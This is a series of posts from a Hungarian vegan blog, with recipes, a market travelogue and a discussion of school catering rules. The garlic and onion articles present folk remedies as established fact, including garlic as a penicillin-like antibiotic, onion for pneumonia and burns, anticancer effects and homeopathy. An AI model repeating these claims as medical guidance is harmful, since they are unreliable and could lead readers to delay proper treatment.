Málnás jégkrémtortával búcsúzom az augusztustól. Kicsit elszomorodva, mert ez a nyár kevés meleget hozott. A melegebb nyári napokon kivettük a fagyasztóból ezt a tortát, vágtunk egy-egy szeletet és ennyi elég is volt hűsítő édességként, így nem fogyott el azonnal, kitartott egy darabig. (Nyilván, ha többen lettünk volna, egy napot sem ért volna meg.) Mielőtt azonban elkezdenének ostromolni, és magyaros mentalitással negatív kritikával illetni, pontosan tudom, hogy a hulala nem vegán termék, és igen, hidrogénezés által növényi zsír van benne, no meg tejfehérje, ráadásul aroma és színezék. Annyit legalább megteszek azon ritka alkalmak egyikén, mikor mégis eme bűnözésre vetemedek, hogy a kék színű hulalát választom. Így legalább egyéb más dolgoktól megmenekítem szervezetem. Azzal is tisztában vagyok, hogy sok vegetáriánus, akik fogyasztanak sajtot és tejterméket, használnak hulalát (is). A recept Hozzávalók: o 1 pohár hulala (kék, natúr, tehát nem édesített) o 2 pohár piros színű gyümölcs - jelen esetben főként málna volt o kevés nyírfa vagy gyümölcscukor, esetleg méz o kézi robotgép o fólia Elkészítés: Az alaposan megmosott gyümölcsöket villával összetörjük, hozzáadjuk az édesítőt (nyírfa vagy gyümölcscukor, esetleg méz, de nádcukor is jó). A pohárnyi hulalát egy olyan edénybe öntjük, amiben felverhetjük. Elkezdjük robotgéppel felverni és közben hozzáadjuk a gyümölcsöt (télen kiengedett fagyasztott gyümölcsöt is használhatunk, vagy gyümölcsben dús lekvárt). Amikor a hab kemény lesz, fóliával kibélelünk egy választott tálat. Belekanalazzuk a tömény gyümölcsös tejszínhabot, a fóliát a hab tetejére is hajtjuk és mehet a fagyasztóba. Néhány óra múlva a megdermedt habot, mint egy jégkrémtortát szeletelhetjük.
Gyógyító hagymák. 2.rész "Mindenható" fokhagyma
2014. augusztus 15. Éltető ételek
A fokhagymát több mint 4000 éve használják, a piramisok építése során is napi fokhagyma adagot kaptak a munkások. A magyar népi gyógyászat is ismeri és előszeretettel alkalmazza. Legfontosabb hatóanyaga Akkoriban még nem volt ellenérzés az erőteljes illattal szemben, mint manapság. A fokhagyma egyik legfontosabb hatóanyaga a szagtalan alliin, melyből szétrágás/vágás során allicin keletkezik. Ezt az allicin olajat a bőr és a tüdő választja ki, ezért érződik a bőrünkön és a lehelletünkön. Néphagyomány szerint csökkenthetjük ezen illatot, ha petrezselymet, bazsalikomot, borókabogyót vagy fahéjat rágcsálunk vagy 1-2 szem szegfűszeget. Antibakteriális, antivirális és parazita ellenes Nagyon sok jótékony hatása van a fokhagymának, de szerintem az egyik legfontosabb, hogy erős antibiotikum . Még 1:100.000-es hígításban is hat a Gram-pozitív és Gram-negatív baktériumok ellen. 1 mg allicin 15NE penicillinnek felel meg. De nemcsak a baktériumok ellen kiváló, hanem a vírusok (pl. herpesz, szemölcs) és paraziták (pl. bélféreg, körömgomba) ellen is. Bél-ügyek Viszont az egészséges bélflórában nem tesznek kárt . Sőt, erősíti az emésztőrendszerben lévő mirigyeket, és jótékony hatása van a bél nyálkahártyájára is. Tehát elmondhatjuk azt, hogy segít helyreállítani bélflórát. Kiváló gyógyszer puffadás, hasmenés és a bélgörcsök esetén. Gátolja a gázképződéssel járó rothadási és erjedési folyamatokat. Bevethető a Helicobacter pylorit esetében is, mely köztudottan a gyomorfekély és gyomorrák kialakulásáért felelős. Szív- és érrendszerre gyakorolt hatása felülmúlhatatlan Ezenkívül erőteljes koleszterin és triglicerid csökkentő hatása van. Napi 3-10g nyers fokhagyma fogyasztása 6-16 hetes kezelés után 16%-kal csökkenti a koleszterint, és 30%-kal a triglicerint. Remekül szabályozza a vérnyomást , csökkenti az arrtériák meszesedését, ezáltal megelőzi a trombózis kialakulását. Véralvadásgátló , ezért az ilyen gyógyszert szedők erre fokozottan figyeljenek. Értágító hatása is ismert, oldja a szív koszorúereinek görcsét, ezáltal javul a szívizom vérellátottsága. Fokozottan hat a láb, a szem és az agy szűkült ereire . Időskorban jellemző az időszakos sántítás (claudicatio intermittens), amikor járás során a kezdődő elmeszesesedés miatt a láb izmai kevesebb vért és ezzel oxigént kapnak. Ilyenkor fellépő göcsös fájdalom, zsibbadás megállásra kényszeríti a beteget. Nos, egy 6 hónapos fokhagyma kúra tünetmentességet eredményezhet. Vércukorcsökkentő hatása is ismert, kiváló kiegészítő terápia lehet a cukorbetegség kezelése során. Antioxidás hatású , így az immunrendszert is erősíti. Bevetés a nehézfémek ellen A fokhagyma a kénvegyületeinek köszönhetően fel tudja venni a harcot a nehézfémek ellen is. Ólombányászatban dolgozókon végzett statisztikai felmérés szerint, akik rendszeresen fogyasztottak fokhagymát, azoknál nem jelentkeztek az ólommérgezés tünetei. De a higany és a kadmium kivezetésében is hatásos. Csodás antibiotikum a fokhagymás méz Megelőzés esetén napi 1-2 gerezd fokhagyma fogyasztása javasolt. Amennyiben hasmenés lép fel, akkor 5-10 gerezdet is fogyaszthatunk, egész napra elosztva. Ne felejtsük el, hogy nyersen, szétrágva fog az allicin hatóanyag érvényesülni, ezért így fogyasszuk. A mézes fokhagyma kiváló immunerősítő a téli időszakban, a fokhagyma íze így kevésbé intenzív. Külsőleg is használhatjuk ám Külsőleg használhatjuk rovarcsípés, bőrgombásodás esetén. Szemölcsök, kelések esetén sebtapasszal ragasszuk fel a fokhagymát, és hagyjuk hatni pár órán keresztül. Tibeti ősi recept Fiatalító hatású fokhagyma kúra recept bejárta a világot, melyet 1971-ben találtak egy tibeti kolostorban egy cseréplapra vésve. A leírt készítmény megtisztítja a testet a felesleges zsírtól és a salakanyagtól. Javítja az anyagcserét, az ínszalagok rugalmasságát és érelmeszesedés gátló.
Gyógyító hagymák. 1.rész Vöröshagyma és gyógyhatásai
2014. augusztus 9. Éltető ételek
A hagyma egy igazi magyar zöldség és fűszernövény, az őseink a mindennapokban rendszeresen fogyasztották. Ösztönösen tudták, hogy jó, kell a szervezetnek. Talán a legismertebb a vöröshagyma és a fokhagyma, a gyógyhatásait a népi gyógyászat is előszeretettel alkalmazta . De ne feledkezzünk meg a zöldhagymáról, medvehagymáról, póréhagyáról, gyöngyhagymáról, lilahagymáról, salátahagymáról vagy akár a metélőhagymáról sem. Én minden nap használok hagymát az ételkészítés során. Nyersen, főzve, sütve, rántva, aszalva... mindenhogy finom . Persze sokan panaszkodnak, hogy nyersen nem bírja a gyomruk. Nos, ilyenkor szerintem nem az a megoldás, hogy nem eszünk hagymát. Utána kell járni az okoknak. (Nekem akkor oldódtak meg a problémák, amikor rendszeresen elkezdtem inni a zöld turmixot.) Legtöbbször gyomrégésre, gyomorsavtúltengésre panaszkodnak. Sok esetben persze a gyomorégést éppen a kevés gyomorsav okozza. Ez úgy lehet, hogy ha kevés sav termelődik, akkor az elfogyasztott étel nem tud elég gyorsan és alaposan megemésztődni, ilyenkor az ott maradt étel erjedni kezd. És éppen ez fog savat termelni, ami irritálja a nyálkahártyát. Egy kis múlt ... Már az ókorban is ismerték és használták, nemcsak a fazékba hanem gyógyításra is. Paracelsus azt mondta: A hagyma olyan értékes, mint egy egész patika. Az ókori Egyiptomban Ízisz szent növénye volt, még a hieroglifák között is megtalálható, mely a termékenység, növekedés szimbólumaként szerepel. 17-18 században a híres makói vöröshagyma Európa szerte ismert lett. Hatóanyagai ... Minden hagyma botanikailag a liliomfélék csoportjába tartozik. Nagyon sok értékes vitaminokat és ásványi anyagokat tartalmaznak, mint például a kálcium, foszfor, kálium, nátrium, magnézium, vas, cink, réz, B vitaminok tárháza, valamint C vitamint is megtalálható bennük . Jellegzetes csípős ízét és illatát egy kéntartalmú vegyület, az alliszulfid adja . Ennek köszönhető baktériumölő hatása, meghűléses időszakokban nagyon hasznos a fertőzések leküldésében. Csípős hatásából következik, hogy melegítő hatása van, ezért lázas betegség esetén nem ajánlott nyersen fogyasztani. Meghűlésre bevethető A vöröshagyma a meghűléses betegségek gyógyszere . A népi gyógyászatban előszeretettel használják hurutos állapotok, légúti betegségek esetén. Reggel éhgyomorra egy kis fej vöröshagymát egyen meg, tisztítja a tüdőt - ezt tarja a néphit. Csökkenti az orrdugulást, illóolaja fellazítja a légutakat befedő nyákos anyagot. Enyhíti a hörghurutot, az erős köhögést és a rekedtséget. Hatékonyan alkalmazható a megfázás, influenza, torok- és mandulagyulladás, sőt a tüdőgyulladás esetén is. Mindenképp próbáljuk ki a hagymateát, mely során a hagyma héját is felhasználjuk. Emésztőszervi és vizeletképző problémák A nyers hagyma megöli a gyomorban és bélben található kórokozókat , erősíti a természetes bélflórát, javítja az általános emésztést. Kiváló hatással bír a hólyaggyulladás és a vesegyulladás esetén, mivel azok kórokozóira is hat. A hagymabor alkalmas a vizeletképző szervek átmosására és a felgyülemlett víz eltávolítására. Ebből adódóan csökkenti az ödémát. Hagymaszirup készítése során a kipréselt nyers vöröshagymalevet keverjük el mézzel és ezt kanalazzuk betegség esetén. De megelőzésre is kiváló. Amennyiben a hagymát felvágjuk, remekül bevonzza a levegőben lévő mikróbákat, és illóolajai az éjszakai alvást is nyugodtabbá teszi (tegyük a felvágott hagymát fejmagasságba). Szív- és érrendszer Kedvezően hat az érelmeszesedés megelőzésében, a koleszterinszintre . Ha belegondolunk, hogy mi volt az aratók tarisznyájában: szalonna és hagyma. Így a zsíros szalonnát remekül kompenzálja a hagyma gyógyhatása, segíti a zsír emésztését, megakadályozza annak lerakódását. Antibakteriális Baktériumellenes hatását már Pasteur is leírta, orosz tudósok 150 növény közül a fokhagymát és a vöröshagymát találták a legerősebb baktériumölőnek. Rákellenes A rákellenes hatása is számottevő, mivel a kénvegyületei gátolják egyes tumorsejtek növekedését (nyelőcső, gyomor, vastagbél, tüdő). Külsőleg is hatásos Külsőleg , ha sebekre, pattanásokra, kelésekre tesszük, annak érlelő hatása hamarabbi gyógyulást eredményez. Égési sérülés esetén nyerjük ki a hagyma levét, a kapott lében áztassunk be egy gézt, és helyezzük az égett felületre. Fülfájás esetén a felszeletelt hagymát tegyük egy ruhába, majd ezt a fülhöz. Kívülről ezt melegítve az illóolajat befelé párologtatja. De a fülborogató szett is segítségünkre lehet. A hagyma héjából készült főzet szép vöröses árnyalatot ad a barna hajnak. A hagymapakolás bevethető reumatikus és ízületi fájdalmak esetén is. Egy hagymát vágjuk apróra, egy csipet sóval készítsünk belőle pépet. Nyers hagymát helyezhetünk szemölcsre, tyúkszemre is, de zúzódások, rándulások esetén is segítségünkre lehet. Allium cepa, mint homeopátiás szer Lehet sokunknak ismerős homeopátiás szere az Allium cepa (D6-C30). Ez egy tüneti szer, a következő esetekben bevethető: - bőséges, híg, maró orrváladék (mely kisebesíti az orrszárnyat) bőséges, - NEM maró könnyezés heves tüsszögési roham orrcsöpögés n - átha - fejfájással - csiklandozó érzés a gégében - krákogás - javulás: friss levegőn - rosszabbodás: meleg szobában, reggel felkeléskor Úgyhogy fogyasszunk minden nap friss vöröshagymát, a testünk meghálálja.
Fiume piacán járva....
Úgy is írhatnám, hogy Rijeka piacán járva, de a Fiume név talán többeknek ismerős. Ha máshonnan nem, a Fiumei útról, ahol Budapest legszebb temetője, temető-parkja helyezkedik el. De kanyarodjunk vissza Rijeka piacához. A kettős név onnan ered, hogy egy időben a város bizonyos része, mondhatni az egyik fele olasz fennhatóság alá tartozott, míg a másik szerb-horvát-szlovén irányítás alá. Később pedig az egész város Olaszország, majd Horvátország határán belül volt. A Fiume olasz szó, akárcsak a Rijeka horvát főnév folyót jelent, ami nem véletlen, hiszen a Recsina itt ömlik a tengerbe. Persze nem csak az olaszoknak és a délszlávoknak volt szerepe a város életében. Bizonyára sokan emlékszünk még arra történelemórákról, hogy valaha Magyarországnak is az Adria volt a tengere. A város, Rijeka/Fiume ekkor fénykorát élte. Fejlődött az infrastuktúra, számos épületet ekkor emeltek. Némi magyar vonatkozása is van Horvátország egyik legnagyobb kikötővárosának, konkrétan két dolgot említek meg: 1914-ben itt készült Magyarország legnagyobb csatahajója, a tragikus sorsú Szent István, valamint itt született Kádár János. (forrás: Wikipédia) Nos horvátországi utazásaink során szerettem volna felkeresni a rijekai piacot. Interneten keresgéltem útleírásokban, de megnyugtató és elégséges információt nem találtam. Ezért most gazdagítom tapasztalatommal a webet. :) GPS vezérlésével KRK szigete felől érkeztünk a városba, s elég gyorsan megláttuk az autónkból a piacnak tűnő kofákat, akik zöldségeiket és gyümölcseiket árulták. Megörültünk a pillanatnyi látványnak és a közelben fellelt parkolóba leparkoltunk (7 kuna/óra). Gyalogosan elindultunk felfedezni a piacot, s közeledve némi csalódottság lett úrrá rajtam, mivel úgy tűnt, ez inkább bolhapiac, ugyanis szedett-vedett holmijukat árulták az emberek, majd következett néhány zöldség és gyümölcskereskedő, és ennyi. Furcsállottam magamban, egy hatalmas kikötővárosnak ilyen csekély lenne a piaca? Splitben is szép, kiterjedt piac volt, Rijekában is így kellene lennie. Nem is vettünk semmit. Viszont gyalogosan tovább álltunk, remélve, hogy van máshol piac. A korzóra, Rijeka sétálóutcájára tévedtünk. McDonalds, Rijekai Rádió épülete és találtunk egy városi térképet, ahol sikerült felfedeznem: Trznica (magyarul: piac). Térképen kiszúrt hely felé vettük lépteinket és hamarosan megláttuk a zöldes színűre festett épületet. Egy aluljárón keresztül megközelítettük és már ott is láttuk a portékáikat áruló embereket. Olívaolaj - házi sajtolású olívaolaj volt a fő cél, amit hamar meg is leltünk több helyütt. Vettünk is belőle. Nem bántuk meg. :) Igazi dús olívás íze van. A piac 3 fő zöldes színű épületből áll. Az elsőben tésztákat, olívabogyókat, édességeket, stb. árulnak. A másodikban hentesek portékáit és az utolsó az igazi halpiac. Ilyen halpiacon még nem jártam. Ugyan nem eszünk halat , de ilyet eddig még nem láttam. Ezért is készítettem képeket róla. Mindenesetre a látvány csak jobban megerősít abban, hogy a jövőben sem kívánok azon "vegetáriánusok" közé tartozni, akik halat esznek. Sem rendszeresen, sem ünnepekkor. Továbbiakban beszéljenek helyettem a képek: Képek a zöldség-gyümölcs piacról: Egyéb portékák belső csarnokában: Képek a halpiacról: FIGYELEM! EGYES VEGETÁRIÁNUSOK SZÁMÁRA MEGRÁZÓ KÉPEK JÖHETNEK A HALPIAC CÍMSZÓ ALATT! A térkép és a közeli kikötő-részlet:
Töltött paprika gombás-hajdinás töltelékkel (vegán, gluténmentes)
Az egyik kedvenc ételem a töltött paprika. Gyerekkorom óta nagyon szeretem. Azt gondoltam sokáig, ez tipikus magyar étel. Ha meg is található a magyar éttermek étlapjaink, tudni kell, eredetét nézve török étel, ami a Balkánon keresztül jutott el hazánkba. Már az 1891-ben megjelent magyar szakácskönyvben, amely Zilahy Ágnes nevéhez fűződik, megtalálható a töltött paprika, tehát meglehetősen régi ételről van szó. Nyilván ezért gondolják sokan azt, hogy magyar étek,pedig csak a magyar konyha jellegzetes kedvence. Most gluténmentes változatot próbáltam ki, hogy ötletet adjak gluténmentes barátnőmnek. :) Nekem egy kevés zabpehely is kellett hozzá. Sok gombóc lett, és inkább ezért tört össze 3-4 darab a legalján, de ahogy a képek is mutatják, a java egészben maradt. A recept: Hozzávalók: o 6-8 db tölteni való paprika o 30 dkg gomba o 25 dkg hajdinazabpehely o 2 evőkanál őrölt lenmag (elhagyható) o ételízesítő vagy só o őrölt kömény o 1 fej vöröshagyma o 2-3 gerezd fokhagyma o petrezselyemlevél o majoránna o 6-8 szem krumpli (opcionális) o 1 liter paradicsomlé, vagy paradicsomszósz Elkészítés: A hajdinát miután alaposan megmostuk, puhára főzzük. Közben a hagymából és gombából egy pörköltes alapot készítünk. Ha krumplival tálalnánk a töltött paprikát, akkor a krumplikat hámozás után kockákra vágva kevés sós vízben feltesszük főni. A víz éppen, hogy ellepje. Amikor puhára főtt, de még nem szétfőtt, leszűrjük. A levét érdemes félre tenni - felhasználhatjuk pl. kenyérsütéshez. A megpuhult hajdinát A gombapörkölt alappal és némi zabpehellyel (elképzelhető, hogy nélküle is menni fog) összekeverjük. A masszát a felsorolt többi hozzávalóval (aprított fokhagyma és vöröshagyma, fűszerek, lenmag) ízesítjük. A massza akkor jó, ha gombócokat tudunk formálni belőlük. Valamennyire kemény gombócokat. Ha puhák lesznek, és szinte szétesnek, akkor tegyünk még hozzá zabpelyhet. Amikor elkészült a töltelék, a paprikákat megtöltjük és a maradékból gombócokat formálunk. Széles lábosba fektetjük őket és paradicsomlével felöntjük úgy, hogy kb. 3/4 részéig ellepje a szósz. A paradicsomlevet főzés közben egy kicsit megsózzuk, majd a végén némi petrezselymet szórunk bele. A paprikák és a gombócok aránylag hamar megfőnek. Ha jól emlékszem bő negyed óra, 20 perc főzés közepes lángon elég neki. Ha gluténmenteset szeretnénk készíteni, akkor olyan zabpelyhet válasszunk, ahol ezt jelzik. UI: Mindeddig technikai hiba miatt nem tudtam írni egyetlen bejegyzést sem júliusban. Sajnos az inda.hu-val nem találtuk a megoldást, ezért egy informatikus segítségét kértem, így sikerült végre ezt a bejegyzést létrehoznom. Köszönöm a türelmet minden kedves olvasómtól! :)
A vegán- vegetáriánus gyermek - közétkeztetés lehetőségei Magyarországon
Amikor ezt a bejegyzést írom, éppen 2014. nyarában járunk. És a most létező hivatalos jogszabályozások szerint a címben szereplő, azaz vegán gyermek-közétkeztetésre Magyarországon, gyakorlatilag LEHETŐSÉG NINCS... ! Hivatalosan... mert különféle külvárosi legendákról azért hallani itt és ott is... meg néhol azt mondják, a lakto-ovo (azaz a tejterméket és tojást fogyasztó) vegetáriánus étel megoldható... VOLT, eddig... Na, de miről is van szó konkrétan, hogy azért ne csak ködösítsek... 2006-ban felkerült a netre egy vegetáriánus anyuka ÁNTSZ-szel folytatott levelezése a témában, melynek a végén a hivatalos álláspont az volt, hogy ha az anyuka meg tudja beszélni az adott helyi intézménnyel, majd kér és kap a helyi ÁNTSZ-től egy igazolást, hogy otthonról viszi be az ételt, akkor mehet... Ezt a levelezést elolvashatod részletesen ITT! Az azt követő években, gyakorlatilag szerintem szinte minden vega-vegán szülő, akik úgy döntött, hogy a családi étkezést szeretné továbbvinni az intézményekben is, erre a levélre hivatkozással ment az ANTSZ-hez igazolásért. Aztán ha megkapta, és az oviban, suliban meg is tudta beszélni, akkor bevihette az ebédet. A másik már korábban is létező opció volt ilyen esetekben a Waldorf óvodák-iskolák rendszere, ahol alapból vegán étkezés biztosított, de ez főleg csak a tízórai (mert a waldorfos óvodák és az iskolák alsó tagozata is tudtommal az ebéd előttig van nyitva, így az ebédet így is úgy is otthon eszi meg a gyerkőc). 2013. nyarán nagy port kavart egy az ombudsman által egy képviselői felvetésre írt válasz, miszerint valóban nem áll-e jogában bevinni a szülőnek ételt az óvodába-iskolába abban az esetben sem, ha az adott intézmény nem tud megfelelő étkezést biztosítani a gyermeknek? Az ombudsman válaszát és a teljes történetet ITT olvashatjátok, de röviden annyi lett a konklúzió, hogy de, bevihet a szülő ételt, ha nem megfelelő a minőség, kérdés persze, hogy mi minősül szerintük és az ÁNTSZ szerint nem megfelelőnek.... és ki dönti ezt el... és az iskola biztosítja-e a tárolást-melegítést... és ha nem, akkor az ÁNTSZ felszólíthatja-e erre az iskolát, akarja-e felszólítani...? Ezután az ügy után több vega-vegán fórumon nagy fellélegzések kezdődtek, hogy hurrá, akkor ismét alátámasztható valahogy hivatalosan is a vega-vegán étrend érvényessége, és főleg az, hogy bevihetjük... mert szerintünk természetesen ez (lenne) a megfelelő a gyermekeink számára! Aztán 2013. decemberében, a kételyek eloszlatása érdekében előtérbe került egy új közétkeztetési törvény kidolgozása, mert hogy gyakorlatilag 1999 óta nem volt benne állítólag jelentősebb átdolgozás, tehát éppen megérett a változásra. Ez még csak így rendben is lenne, de sajnos nem a vegán gyerekek javára lett változás... Az egyik legfontosabb mondat ugyanis a vegán családok számára ez benne: "(2) Állati eredetű fehérjeforrást minden főétkezésnek, bölcsődei étkeztetés esetén az egyik kisétkezésnek is tartalmaznia kell." Ez is érdekes: "Közétkeztető az általa ellátott valamennyi korcsoport számára naponta biztosítja a (2)-(5) bekezdésben foglalt élelmiszereket, az ott meghatározottak szerint. E rendelkezést a 15. § szerinti diétás étkeztetésre is alkalmazni kell, ha az adott élelmiszer a diétában alkalmazható. (2) Egész napos étkeztetés esetén egy főre biztosítandó legalább a) 0,5 liter tej vagy ennek megfelelő mennyiségű kalciumtartalmú tejtermék, b) négy adag zöldség - ide nem értve a burgonyát - vagy gyümölcs, ezekből legalább egy adag nyers formában, c) három adag gabona alapú élelmiszer, melyből legalább egy adagnak teljes kiőrlésűnek kell lennie. (3) Bölcsődei étkeztetés esetén egy főre biztosítandó legalább a) 0,4 liter tej vagy ennek megfelelő mennyiségű kalciumtartalmú tejtermék, b) három adag zöldség - ide nem értve a burgonyát - vagy gyümölcs, ezekből legalább egy adag nyers formában, c) két adag gabona alapú élelmiszer, melyből legalább kétnaponta egy adagnak teljes kiőrlésűnek kell lennie. (4) Napi háromszori étkezés szolgáltatása esetén egy főre biztosítandó legalább a) 0,3 liter tej vagy ennek megfelelő mennyiségű kalciumtartalmú tejtermék, b) két adag zöldség - ide nem értve a burgonyát - vagy gyümölcs, ezekből legalább egy adag nyers formában, c) két adag gabona alapú élelmiszer, melyből legalább egy adagnak teljes kiőrlésűnek kell" A teljes törvényt, ami a 2014. szeptemberében kezdődő tanévvel lép életbe, ITT olvashatod el! És még egy fontos dolog, hogy ha diétás étrendet igényel a gyermek, akkor azt orvosi papírral igazolni kell (ez eddig is így volt), és ha az adott intézmény nem tudja biztosítani a diétás ételt, megrendeli egy másik intézménytől. De nem a szülőtől... Egy fontos kitétele viszont a törvénynek, hogy a rendelet betartása nem kötelező hatályú a családi napközik esetében... Tehát ott esetleg talán... Na, szóval, ez a jelenlegi helyzet Magyarországon, de nagyon szívesen venném gyakorlati tapasztalataitokat a témában, segítsük egymást a tapasztalatok megosztásával is! És akár megoszthatjátok a Facebookos 'Vegán Anyukák, Kismamák' csoportunkban is!
Vegán őszibarackos pite + Nyereményjáték
2014. július 1. Zizi kalandjai
Nem is meséltem milyen izgalmakkal indult a londoni utazás… szóval állunk sorba az átvilágításhoz a reptéren Budapesten (kedvesek voltak, előre engedtek minket egy rövid sorba, mivel babával voltunk), persze Ádi elaludt a babakocsiban. Nincs mese, fel kell ébreszteni a gyereket. Megvolt. Aztán kipakolni aprópénzt, laptopot, övet, baba ételt és italt, egyéb folyadékot… szinte mindent ki kellett pakolnunk a szalagra. Igyekeztem Ádira figyelni, mert nemrég ébredt, amikor I. szólt, hogy mintha Jude Law hangját hallaná a mellettünk levő sorban (imádom csak a hangját hallgatni is). Mire odanéztünk már csak háttal láttuk elmenni mellettünk, de hátulról elég Jude Law formájú volt. Szóltam I.-nek, hogy siessen a pakolással, nem hagyhatom az egyik kedvenc férfi színészemet meglógni. Táskával a vállamon, Ádival a karjaimban rohanok Jude után és már előre örülök – mit örülök, sikítozok magamban -, hogy együtt, egy repülőgépen utazunk Anglia egyik sármőrjével. Utol is értük, amikor Jude éppen az utolsó forintjait váltotta vissza fontra, majd a fiával és a kísérőjével – aki egyébként egy nagy il Bacio di Stile bevásárló táskát cipelt neki – sétáltak tovább előttünk. Senki nem volt a közelünkben és bénán tébláboltunk, hogy odamenjünk hozzá egy közös fotót kérni vagy sem. Nyuszik voltunk, betojtunk és nem mertünk odamenni… Jude-ot fel is kísérték a VIP váróba, szóval rájöttünk, hogy nem is velünk fog utazni Londonba Easyjet-tel, hanem az utána induló British Airways-zel, nyilván business osztályon. Konstatáltam, életem nagy lehetőségét halasztottam el… mikor fogok én legközelebb Jude Law-val néhány szót váltani, esetleg egy közös fényképet készíteni? Na, el is határoztam, hogy többet nem leszek ilyen nyuszi, így a konferencián meg is ragadtam az alkalmat, nem tébláboltam és odamentem Yotam Ottolenghi-hez, meg Donal Skehan-hoz is, hogy közös fotót készítsek velük! A sztár kalandok után jöjjön a recept. Magdi vegán blogját követem már egy ideje, rengeteg receptet oszt meg, hihetetlen termékeny, holott neki is van egy Ádinál néhány hónappal fiatalabb kisbabája, Fanni. Ettől függetlenül süt, főz a konyhában és posztolja is azt a rengeteg receptet. Néhány hónapja derült ki számomra, hogy készített egy vegetáriánus gyerekeknek szóló szakácskönyvet, “A főzés gyerekjáték!” címmel. Kaptam belőle egy példányt és örömmel vetettem bele magam az átlapozásába. A különböző fejezetek (Jó reggelt!, Levesek családi ünnepekre, Zöldségparádé a hétköznapokra, Saláták a mindennapokra, Édes élet télen-nyáron, stb.) receptjei tippekkel, ötletekkel vannak színesítve. Minden receptet egy szépen, jól komponált kép tesz még érdekesebbé, a nyelvezete is könnyű, egyszerűen vannak leírva. Nem tudok róla, hogy lenne hasonló vegetáriánus gyerek szakácskönyv a piacon, szóval Magdi hiánypótlót alkotott (egyelőre). Felnőttek is süthetnek, főzhetnek a könyvből, de úgy gondolom, hogy 6-7 éves kortól lehet érdekes a könyv gyerekek számára. A 85 receptből álló szakácskönyvet ezen a linken tudjátok megrendelni. Vegán őszibarackos pite Hozzávalók: - 1/2 bögre teljeskiörlésű tönkölyliszt - 1/2 bögre finomliszt - 1/2 bögre nádcukor - 1/2 bögre rizstej - 1/4 bögre napraforgó olaj - 1 nagy alma, meghámozva, kimagozva, lereszelve (én babareszelőt használtam, hogy pürés legyen az állaga) - 1 zacskó foszfátmentes sütőpor - 2 csipet só - 7-8 db őszibarack, félbe vágva, kimagozva (A recepthez használt bögre 250 ml-es.) Melegítsük elő a sütőt 170 fokra. Egy tálban a liszteket keverjük össze a sütőporral és a sóval. Egy másik tálban keverjük össze az almapürét az olajjal és a nádcukorral. Keverjük hozzá a rizstejet, majd a nedves hozzávalókat fokozatosan keverjük a szárazhoz, amíg sima tésztát kapunk. A tésztát öntsük kiolajozott, belisztezett pite- vagy tortaformába (kb. 23 cm átmérőjű). Forgassuk lisztbe a félbevágott őszibarackokat és tegyük a pite tetejére (én nem kaptam magvaváló őszibarikat, ezért macerás volt a félbe vágásuk, így nem raktam túl sokat a tetejére, de ti jól pakoljátok meg a pitéteket barackokkal). 170 fokon süssük kb. 30 percig (szúrjunk bele egy fogpiszkálót és ha már nem ragad rá tészta, valamint aranybarna a teteje, akkor jó). ***** NYEREMÉNYJÁTÉK! Nyeremény : egy darab “A főzés gyerekjáték!” vegetáriánus gyerek szakácskönyv. Menjetek fel Magdi blogjára és írjátok meg ide a bejegyzés alá kommentben, hogy Magdi melyik receptjét készítenétek el! a Rafflecopter giveaway Szabályok : 2014. július 6-ig lehet játszani! Eredményhirdetés 2014. július 7-én! A nyertest emailben fogom értesíteni, majd a neve kikerül a blogra (ez a bejegyzés fog frissülni). A nyertes szakácskönyvét Magdi fogja postázni magyarországi címre!
Pizza
Vannak időszakok, amikor úgy bekattan az emberben, hogy pizzát, hamburgert, vagy sült krumplit enne, vagy általánosságban valami jó egészségtelen kaját. Aztán ha sikerül, elkészíti magának finom és egészséges formában. Legutóbb, mikor a Corner-es pizza félujjnyi vastag sajtréteggel érkezett a többieknek, érlelődött meg bennem a gondolat, hogy ideje vegán sajtkrémet készíteni. A másik fajtából én is ettem, és nem is rossz, de összehasonlíthatatlan a frissen sült barna tészta és a sok zöldség együtt. A sajtkrém megpirulva kifejezetten fenomenális, bár senki ne várjon totális sajt ízt, mert az nem űberelhető. Már csak azért sem, mert a sajt addiktív, bár nagyon kevesen tudnak róla, a tejben lévő kazein lebontása okozza. Ezek kívül nehezen emészthető, magas a só és zsírtartalma is, nem is szólva a gazdaállat kérdéses egészségi állapotáról. Hozzávalók: (2 tepsire való adag) PIZZATÉSZTA: 50 dkg teljes kiőrölésű liszt 10 dkg fehér liszt 360 ml víz (amennyit felvesz) 2 ek olivaolaj 2 dkg élesztő 1 tk só 1 tk méz Ha van kenyérsütő gépünk, a tésztát abban kidolgoztatjuk, vagy kézzel jó alaposan összegyúrjuk. Kinyújtjuk, zsírpapírral kibélelt tepsibe tesszük, hagyjuk pihenni fél órát. FELTÉT: Zöldségek: Brokkoli, gomba, tv paprika, paradicsom, hagyma, cukkini Gabonakolbász Bármilyen más fajta gabonakolbász is jó, a Vagabondé is pl, de leggyakrabban ezt használom, finom is, magyar is, nem méregdrága, nem utolsó sorban házhoz jön, mert a sógornőm hozza kérésre. :) Akinek egyébként ma van a születésnapja, így ezúton is kívánok neki nagyon sok b o l d o g s z ü l e t é s n a p o t ! A cukkinit nem nagyon szeretem, de legutóbb felvágtam karikákra, és megforgattam egy kis magyaros fűszerkeverékben, úgy tettem a tésztára. Finom volt. A zöldségeket tisztítjuk, felvágjuk, a tésztára igazgatjuk, a gabonakolbászból közé morzsálunk egy darabot. Erre paradicsomszószt nem teszünk, mert a sajtkrémmel együtt, már nem sül át. VEGÁN SAJTSZÓSZ: 1/2 csésze hántolt napraforgó 1/4 csésze zabpehely kicsit kevesebb, mint 1 csésze víz 1/4 citrom leve 1 gerezd fokhagyma 1 tk só 1/4 pritaminpaprika 1 ek sörélesztőpehely A napraforgót kevés vízzel turmixoljuk, majd hozzáadjuk a a zabpehelyhet, a citromlevet, fokhagymát, sót, pritaminpaprikát. Addig turmixoljuk, míg finom szósz nem lesz. A vizet lassan adagoljuk addig, míg sűrű, de önthető krémet nem kapunk, amelyet egyenletesen ráöntünk a pizza tésztára, és óvatosan eligazgatunk a zöldségek tetején. Forrás: Balázs Katalin - Kiss Balázs: A Biblia a helyes táplálkozásról c. könyv. Közepes hőfokon 45-50 percig sütjük, míg a szósz szépen meg nem pirul a tetején, és a tészta is átsül.
Táplálj helyesen édesanyám! (4. rész) + Nyereményjáték
2014. május 20. Zizi kalandjai
